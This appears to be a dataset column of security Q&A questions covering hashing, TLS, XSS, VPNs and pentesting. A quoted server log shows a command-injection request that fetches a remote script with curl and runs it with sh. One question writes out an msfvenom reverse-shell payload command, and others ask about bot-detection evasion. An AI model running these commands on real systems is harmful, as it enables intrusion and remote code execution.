instruction
stringlengths
24
29.9k
A small company has a big list of customers. The list contains personal information like names, phone numbers, addresses, info (like what products bought) and some small notes. The data is stored at the computer in the office of the company. The company does not use any cloud service for anything. Backups are manually ...
I have read here and here, that instead of using pepper, it is better to encrypt hashed/salted passwords before storing in the database. Especially with Java, as there's no library for salt/pepper, but just for salt hashing, and I'm not going to implement my own crypto in any way. Have questions about it: Is it true? ...
Why is it a bad idea to encrypt a salted password hash with RSA (or maybe other public-key algorithm) before storing it?
RFC8446/TLSv1.3 Section 9.1 says that "implementations SHOULD support X25519". An online list of software supporting Curve25519 list both Firefox and /Chrome as supporting it for TLS. I did an experiment and created a self-signed TLS cert with Ed25519. Both Chromium 84 and Firefox 79 complain about not being able to ne...
I am currently doing a bug bounty program and found a possible file upload vulnerability, but I am not so sure about it. The vulnerability is on the chat function. In the chat function, users are allowed to communicate with each other and attach files. Upon sending the message, I turned on my burpsuite and intercept th...
I'm trying to understand how shellcode works. I wrote a simple program in C#, then I used Donut to create the shellcode from that exe in base64 format. Then, I wrote again another program to convert the base64 shellcode in a sequence of bytes, in order to reproduce the original exe. I noticed a difference: ILSpy is abl...
Suppose a packet is encrypted and sent via an insecure channel so that it is intercepted by a malicious third party as well as the intended recipient. As long as a suitable encryption scheme is used, the message should be (practically) uncrackable. However, assuming that encryption preserves message length to a certain...
Let's say we have a separate hashing algorithm called s2 and it would convert Hello into dug84nd8. If we could take the algorithm and just reverse engineer it to generate a string like 8GN492MD that would also output dug84nd8, wouldn't it say that (s2("Hello") = s2("8GN492MD")) == true), and let a hacker in? I feel lik...
I am using python requests library to make HTTP calls. However website bot detection is using JA3 fingerprint verification and blocking me. Is there any way I can spoof the JA3 signature.
I am writing a python program in which I use encryption. The user can set the password and when it will be an input, the database will be decrypted. However, the function needs the decryption key to decrypt. So I thought about hiding that key somewhere(encryption and decryption key will be generated dynamically which m...
I am a Mac user. I opened a keyfile generated by Veracrypt and one generated by KeepassXC. The texts in both of them were quite short. Which keyfile is best (i.e., most random and harder to break through): one generated by Veracrypt or one by KeepassXC? OR: Is it best to create my own keyfile?: I can open a photo with...
When we set up security questions, assuming we answer fairly, we give out to the site our secrets, facts from our past. I wonder if the following is considered: we are encouraged to use a different password for every account, but our mothers have only one maiden name, we've had a limited number of pets, etc. Inevitabl...
Almost every beginners (noob friendly) tutorial written for Stack based buffer overflow explains when using mona module to locate a safe reliable memory address for our EIP to JMP to our shellcode should have Rebase, Safe SEH, ASLR disabled. However in a recent stack based buffer overflow challenge, all the modules mo...
I was issued a chromebook, as was everyone at my school, to use for work in class and in case school has to shut down again. We bring it home so it connects to my personal Wi-Fi when I'm at home. I was working on homework and needed to transfer a pdf file off of my tablet to my chromebook, so I decided to just hook it ...
For this question assume a file with 604 perms in a directory with 700 permissions. Assume this file exists: /test/file A non-root user can techincally read that file but in practice to read it the process must be given the pathname to the file, and the kernel will check that the directory /test has the executable bit ...
I am currently serving out an internship with a small MSP (4 employees, 50-100 clients with between a couple and 100 employees). My main project is to work on a information/cyber security audit document that is to be used by the employees to perform audits for client networks. It contains a checklist of items to check ...
We have a java application which allows users to upload attachments and save it on the server. The application has a content security policy defined like this: base-uri 'self'; child-src 'self'; form-action 'self'; frame-ancestors 'self'; connect-src 'self'; font-src 'self' https://fonts.gstatic.com; frame-src 'self'; ...
In a web application there are several pages in which you have sensitvie data and actions like access controls or user management page. Is it a good idea to re-authenticate user to access those pages? If yes, should they be re-authenticated for each access or is it enough to re-authenticate once till the end of session...
Is pass a real alternative to Keepass in terms of security? While Keepass has its own built-in encryption, pass relies on GPG to secure your passwords. GPG is obviously recognized as providing excellent security for transferring data over insecure networks, when the threat model is a MITM. But is GPG still a reliable w...
We can use CORS to restrict API calls to a specific host in a web app. How to do the same for native mobile app? I want to restrict API calls from my app alone. Is it possible to do so?
Why does Wireshark show tls1.2 but it's actually tls1.0? and sometimes, in almost the same situation it shows tlsV1
I went to bed last night, and put my Android phone into Airplane mode, something I do pretty regularly at night, except when I'm on call. However, this morning my WhatsApp popped up telling me that I'm no longer registered on that device (I'm not sure about the exact wording) and I should register my device again. I di...
I am planning to create an API key using the user's password as message and a random number assigned to that user in my database as key (or vice-versa). I will then store the hash of that API key in my database. This will make it possible to: Let users see their API keys whenever they want by typing their password Let...
When reading about docker, I found a part of the documentation describing the attack surface of the docker daemon. From what I was able to understand, part of the argument is that it is possible to share (basically arbitrary) parts of the host filesystem with the container, which can then be manipulated by a privileged...
We are building something like specific blogging social platform. Architecture was originally intended as to have: single page application: all gui, rendered in the browser on the client frontend: mainly proxy layer, api for that SPA, accessible from the internet backend: not accessible from internet, just 443 port op...
It seems to me that "yes, they can". As I saw it in some countries, entering adult content will simply give a warning message that the site is blocked. Some places even block Facebook similarly. If yes, then technically, ISPs can steal a website's users data by altering legitimate HTML and JavaScript with bad HTML, Jav...
I recently downloaded a .exe file from a person's github. I scanned the file in virustotal.com and it showed none of the antiviruses detected a virus. When I checked its behaviour, it had access to network adapters. Nevertheless, I opened the .exe but it just opened a terminal and showed something and disappeared. When...
Can someone explain to me how OWASP Amass correlates information regarding the intel module domain search? As an example, if I run the command: amass intel -d example.com -whois I'll get a list of domains related to example.com. How are all domains related? How does amass search for the related domains in the intel mod...
I understand that a threat is a possible security violation that might exploit the vulnerability of a system, and a attack is an action on a system that harms the organisation in some way. Therefore, we should detect attacks and prevent or mitigate threats. However, when I look on multiple cybersecurity sources focused...
I have a Yubikey NFC 5, when I enter a wrong PIN or PUK three times the smart card is blocked. Can someone please explain to me how it is blocked ? Does the PIN/PUK functionality is disabled somehow ? Does it set a secret PIN (pretty stupid I believe) ? How can I block or unblock a Yubikey (or any smartcard) programmat...
I know there are few questions about the risk of IMEI with various answers from rare risk to none. But my question is regarding the kind of websites that provide IMEI check services for free with some services are paid. An example is this website: https://www.imei.info/ The stats at below the page are staggering. The w...
For context, my web app will be used by users who don't have a strong technical background. What are the pros or cons for displaying a message like this? Something like:
This application is not using any CSRF token and not even cookies to identify users on their server. All they do is use a authorization header to identify users. Since an attacker doesn't know value of this header he can't send cross site requests unlike in case of cookies, where they are automatically send along with ...
Recently I got a very odd request to my website. This is from the log file: 20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 20.42.89.182 - - [12/Aug/2020:18:...
If I use Tails/tor on public WiFi, and a government agency is controlling /snooping nodes or uses malware to conduct a waterhole attack, what information can they gather about me?
If I download a file (PDF,doc,image,video etc) with a tails/tor setup, how can I ensure the file doesn't "call home" or isnt imbedded with malware (other than looking at the hash)? Will a simple malware scan work? And if I use tails to open the files and disconnect from the network I'm using can I still have my anonymi...
I am a student at University and have completed all on my CompSci courses and am getting started in my concentration, security. What I want to do for my project is create and monitor a secure cloud environment using Openstack. Normally, I would be able to use the Private Cloud provided by my school, but may not be able...
We are working on our Vulnerability Management process and as part of that, I was going through the reports from our infrastructure vulnerability scanner. In the reports, I noticed that some of the CVEs does not have a CVSSv3 score, but they have a CVSSv2 score. Eg: CVE-2008-6536. What does that mean? Does it mean that...
Do ISPs like Xfinity gather geographical information about the users of their public hotspots? If so how is it done and how accurate is it?
AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). https://github.com/Tib3rius/AutoRecon However, I notice that it's taking too long complete. I've test...
What are approaches for monitoring cyber threats “outside” of the organisation, such as data like account passwords, credit cards, company data for sale, etc? While there are services for monitoring account credential availability with email, social media, cybersquatting and so on, can this be done on a much broader sc...
I'm using this Instagram account only on my 2nd phone which has no sim card and airplane mode always on. I use VPN 100% of the time when connecting to the internet. The account isn't linked with any Facebook account. When I checked Instagram Setting > Security > Login Activity, it shows the VPN location. However, when ...
Like many, since March, I've been working from home and using the company's VPN to do my work. Recently, if I open a new tab in Chrome, and navigate to "news.bbc.co.uk", I got the aforementioned error, with the supplemental information being: Attackers might be trying to steal your information from news.bbc.co.uk.x.878...
For a new application I'd like to store messages for each user's account on a centralized server. The user accesses the application through a SPA javascript web app through their browser. These messages: Should be unreadable by the server Are readable only by the user themselves (not other users) Can be added by the s...
I have recently set up parse-server on a DO VPS using 3 docker containers; one for parse-server, one for parse-server dashboard and one for mongodb. Because I am just testing this setup I left the mongo container as it is: mongodb://mongo:27017/dev. I have NGINX (not in docker) running as a reverse proxy (to get SSL). ...
I was working on a bug with our VPN, and read about VPN Phases 1 and 2, each of which have a lifetime in seconds. I was investigating to validate if these had anything to do with the bug we had and apparently not, however I'm still curious has to why do these settings exist at all, what's the purpose of these "lifetim...
I am using a e-banking portal from a major Swiss bank (let's call it "Bank"). Some month ago, a new solution for the processing of electronic billing (e-bill) was introduced. The whole e-bill solution is provided by a third party (let's call it "Partner"). Its user-interface opens within a scrollable area of the e-bank...
I was looking at the answer here and got curious if a function I use may be susceptible to XSS. Mostly because of this statement: Some HTML attributes are inherently dangerous. This includes href, since you can do something like javascript:alert("XSS");. Since you make sure the value will always start with http you sh...
I have 2 certificates (one root and one intermediate). In Windows OS, the Root certificate is in the trusted root store (for current user). The other intermediate certificate (signed by the root CA), is to be found (under current user also) under the Intermediate CA store. I am using SSL verification in one of my clien...
While I understand their function, both IMSI and IMEI makes tracking and surveillance possible by virtue of being persistent idenfitiers for SIM and handset, respectively. Why aren't these replaced with a more secure scheme, maybe something along the lines of randomizing publicly visible device identifier every now and...
We would like to harden our Docker Image and remove redundant software from it. Our Devs and Ops asked to keep some Linux tools used for debugging on the containers running on our Kubernetes Prod environment. I’ve read this post: https://www.digitalocean.com/community/tutorials/how-to-inspect-kubernetes-networking And ...
Recently I've been trying to learn the mechanisms behind SSH keys but I came across this question that I haven't been able to find an answer to (I haven't figured out how to word my question such that searching it would give me the answer). Basically, we add our local machine's public key to the server's authorized_key...
Let us say that a small company has an internal network for employees. All employees are granted Internet access via a NAT device (not a proxy) and perimeter firewall only allows outgoing connections to port 80 and 443. An attacker manages to compromise an employee workstation (say by spear phishing mail) and wishes to...
I've just read about the detecting and blocking of Tor traffic by DPI but now I'm curious about analyzing the data you send over Tor and matching it with your true identity by deep-inspecting the data packets that leave your PC/router. (If that means anything) I don't know much about the technical details of DPI, (whic...
There is a lot of information on how to avoid or detect XSS, but I couldn't find much information on how to monitor for reflected XSS. Is there a way to automatically detect reflected XSS in my application's logs? My guess is that we can run a parser on the logs and signal all the possible reflected XSS attacks. Is the...
For a web app, we are authenticating and authorizing users. There is no Sign-up option, but rather these users are provisioned into the system explicitly and are given certain permissions based on their level. Say a role has access to customer data. This access is required to conduct business processes during business ...
I have a question about the Key Exchange Algorithm used in TLS process. I have read that the Key Exchange algorithm is used by client and server to exchange session keys. Do the client and server exchange session keys at the end of Handshake process? If they arrive mathematically at the same results for session keys at...
With the public beta access to iOS 14 people got a warning when apps access the clipboard, and it lead to people realizing that many apps just grab everything from the clipboard they can get and send it back to their servers. Amongst other things this led to widespread criticism of the TikTok App. Is there a way to mon...
Had few chrome vulnerabilities [CVE-2020-6420] detected by BI(Retina). Upgraded the affected machines to chrome version 84.0.4147.89. After re-scan still the same vulnerabilities are detected. Anyone experienced it before ? please help to resolve
I've read that the Great Firewall now blocks TLS 1.3 connections with ESNI. Is TLS 1.3 usable without ESNI, or does the user have to downgrade to TLS 1.2?
Background Some features are not yet available on the web platform and thus require cooperation with a native application in order to provide them. One method for a web application and a native application to communicate with each other is a custom protocol handler. For instance, the web application can call mycustompr...
When I'm scanning with Nmap, I make an effort to get proper hostnames associated with the target IPs. To do this, I scan UDP 53 on the targets to identify DNS servers and then run something like the following for each identified DNS server: nmap -sL -v4 --dns-servers DNSSERVER TARGETS I have to review the results for ...
I've seen code like this: if(password.length !== allowedPassword.length || !crypto.timingSafeEqual(password, allowedPassword)) So timingSafeEqual is supposed to use the same amount of time to compare 2 passwords, in order to prevent the attack to estimate the complexity of the password. My question is, if the both pa...
I have made a 7z archive using Delta filter containing a wav file and I have protected it with a password. I am running a terminal in Kali Linux. My problem is that I cannot get the password cracked using 7z2john.pl and John the Ripper. If I omit the Delta compression, using only the default compression of 7z, then the...
Let's say that I have an unencrypted file and I'm trying to encrypt it and make sure the original file can not be recovered from my disk. If I, for example, create an archive, put the file into it and encrypt the archive it seems pretty obvious that even if I delete the original file it is still on the disk and can be ...
I wake up this morning to a rebooted server. The DNS server was running at over 100%. After a little bit of work, I got fail2ban in place to block all of those requests. The requests themselves are valid, jut repeated hundred of times per seconds. Once the block got many (hundred) of IPs, I can see that I am blocking 1...
Assuming whatever encryption algorithm used was designed to support compression without any information leakage, would there be any reason not to use some custom compression algorithm to add obscurity to security? Instead of a compression algorithm, what if it were just a simple custom algorithm that mixed the bits or ...
Services like Dashlane and Bitwarden are unable to decrypt your passwords without your Master Password. So, how does Chrome do it when they also state that your passwords are encrypted using your Google username and password?
I am doing a security assessment on the communication security of a legacy IoT device. The objective is to assess and find security gaps in the current design/implementation. The mode of assessment is manual, primarily with the reference of existing design and code. This is only client-side at device; while server is a...
I (will) have a binary executable file. It's only permission is user-execute. It cannot be read by user, group, or world. The owner of the file is the Apache user. I don't want the apache user to be able to read the file, but I do want the apache user (via a PHP script) to be able to execute the file. The binary execut...
I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe In addition I am running a listener with Metasploit's "multi/handler" or alternatively, a netcat listener: nc -lvp 4443 However, ...
Given how UEFI secure boot appears later than TPM, i had assumption that it provides advantages over TPM. As i read into each, it appears to me that the TPM measurements to each stage would provide about the same level of integrity guarantee as how each secure boot stage verifies the next stage's signature. I get how t...
I'm terrified of clicking on links in emails, and yet a colleague insists I do. When I receive an email in my gmail account that contains links of the form http://gofile.me/xxxxx/yyyyyyyyy along with its password, apparently sent from someone I know and expect it from, and who has supplied the password for the link to ...
I'm currently working on setting up a password rotation strategy for an AWS Aurora/MySQL based application. My plan was to use a strategy like this... Application usernames/passwords stored in AWS SSM encrypted parameters. Application servers have access to retrieve only their credentials from SSM. Restricted by envir...
I'm trying to learn to do pen testing and wifi cracking. I had captured handshakes and begun cracking the handshake a day ago, with the password not being in my dictionary list. When trying with a new list I received this error. Invalid packet capture length 1859175202 - corrupted file? Now whenever I capture the hand...
Using the OWASP testing guide, if password strength policy verification is implemented only client-side, can that be considered a vulnerability? In which category? Also which CVSS it should have?
Let us assume that there is a man in the middle who can read (not modify) all the data that's being transferred between a client and the server. We want the client to be able to log in without exposing their credentials. We will be using asymmetric encryption here. When the client wants to login, client will send a sig...
I read that why do we need E2EE and can't rely only on HTTPS for sending messages through a messaging app. The reason which i understood is when sender sends the message to the server, the TLS connection is associated with the server. TLS terminates at the server and whoever controls the server has the ability to view ...
While pentesting in a lab, came across an rcp binary with setuid bit which looked like a potential privilege escalation vector. bash-3.1$ ls -l /usr/bin/rcp -rwsr-xr-x 1 root root 18544 May 18 2007 /usr/bin/rcp Following the explanation at https://securiteam.com/exploits/6b00l1p0bc/ , I tried the following: bash-3.1$...
i have downloaded bwapp from official site and windows 10 defender showing me that it contains a reverse shell ( i know these things are there for practice ) but in earlier days it is not showing that. Is it good to use it is safe to use Or it is just a False Positive
Before the invention of HSTS security policy, if a user didn't specify the protocol in the URL, were all the initial requests sent over HTTP by default for every website?
I am a part of an organization that is developing a website that required user authentication, and we are strongly considering FIDO compliance. However, our use case requires users to be able to log-in from shared computers (i.e. father and son may share the same computer). And we cannot expect our user to carry around...
Is it necessary to periodically re-key end entity SSL certificates apart from typical scenarios like Key lost/key compromise? What benefits does it provides in terms of security and others? Is there any guidelines for that period?
I've read the official page on safety numbers but they are still unclear to me. Without verification, there still is end to end encryption, so what difference does it make? Is it that a phone number is easy to spoof so an adversary could pretend to be someone else but with a safety number verified you would know if it'...
I am new in the world of cryptography. I'm working with an IoT project. My job is to protect the entire data. So, I need some cryptographic security. I want that data should be encrypted before transmitting to the internet. So, if the encrypted data (with digital signature) is transmitted through HTTPS protocol, then i...
tldr: should the level of security measures applied to a GPG private key depend on the use case, or should it always be kept strictly protected? I started using GPG a few years ago, I'm reasonably comfortable with the technical part but I'm still a bit confused about the broader security philosophy. I use GPG mostly to...
I went in a public chatroom. I had a bitter fight with someone. The person blackmailed me. I looked for privacy policy of the chatroom and it said they store my IP, which is visible to the chatroom owner. My concerns are: What all information can be extracted from my IP? Do I need to worry about my breach of privacy? ...
A colleague recieved an unsolicited email along the lines below: Dear Ms. Smith please click on the following link to recieve Document X regarding Project Y. Yours, Eve Nobody eve.nobody@company.com I suggested my colleague to reply to Eve Nobody, and ask whether the email is legitimate. Note, that we typed-in the a...
I was solving SQL injection lab on Portswigger, and the lab was asking to exploit blind SQL injection by triggering time delays, using that to retrieve administrator password. I was making 720 requests by Burp intruder, to test (a-z, 0-9) payload on each position of password whose length was 20. If my condition is true...
I have noticed how important has it become to anonymously contribute to github. I have just created a new account with protonmail and removed my actual account from my Macbook. I still have the public keys. Should I use those public keys to connect my Machine to Github or generate a new pair with a new email? What are ...
Our system supports SAML2 and acts as service provider. Our customer uses ADFS as identity provider. Metadata has been exchanged and the connection works. Unfortunately our system complains about the SAML responses: org.opensaml.common.SAMLException: NameID element must be present as part of the Subject in the Respons...
I have a pivot setup on a compromised windows 10 box and am trying to get an SYSTEM shell on a separate machine in the target network. I have successfully done this abusing an unquoted service path via a meterpreter/reverse_named_pipe that connects to my pivot but can this be done using bind_named_pipe? I may be thinki...
I recently installed a new windows key for my friend. He was using a hack program previously, known as Auto KMS. So after new keys installation, I used Windows defender to remove AutoKMS program. The defender found the kms program in C:/Windows/System32/Tasks/ which I think the hack program needed for bypassing windo...
The Android Bluetooth Low Energy documentation recommends adding application layer encryption on-top of the BLE connection if the exchanged data is sensitive: Caution: When a user pairs their device with another device using BLE, the data that's communicated between the two devices is accessible to all apps on the us...
My company has a firewall set up which, among other things, scans incoming files for malware. The scanner alerted about a malicious file that was downloaded to one of our machines. After some investigating, I learned that this is a program that is necessary to one of the core functions of our company and needs to be do...
I've been going through a hassle with a big mobile company about if I should click into a link in an email that I think is from them. The email and the link inside is not obviously from the company, as the domains do not match up to the providers domain, or alternate domains. It seems through discussion on the company ...
I found out that the landlord of my building is able to access all my internet URLs even though they are HTTPS. Ex they are able to see this entire URL: https://www.google.com/search?q=stackoverflow including path and query params. I verified by clicking on the lock icon of my browser that the certificate issuer is "Go...
Sometimes I order stuff from less-known online stores that ask me to pay directly by providing a card number. Either they don't support PayPal or similar services or they might charge a fee for using them, so that's what I do: I have a card with about $200 on it. This card is blocked by default. When I need to use it,...
We sell our code to a company that they can run our code 100 times a month. We need to do a few things before giving the code to the company. Hide our logic (we can hide our logic by code obfuscation) excessive usage (no more execution of our code than 100 time) redistribution (the company we sold the code to can't ...
I work for a company where we give customer (hundreds/thousands of users) access to 2 sites. One owned by a 3rd party SaaS and one owned by us. Customers spend alot of time registering for both sites and we also spend alot of time removing accounts when customers no longer need access. I would like users to register fo...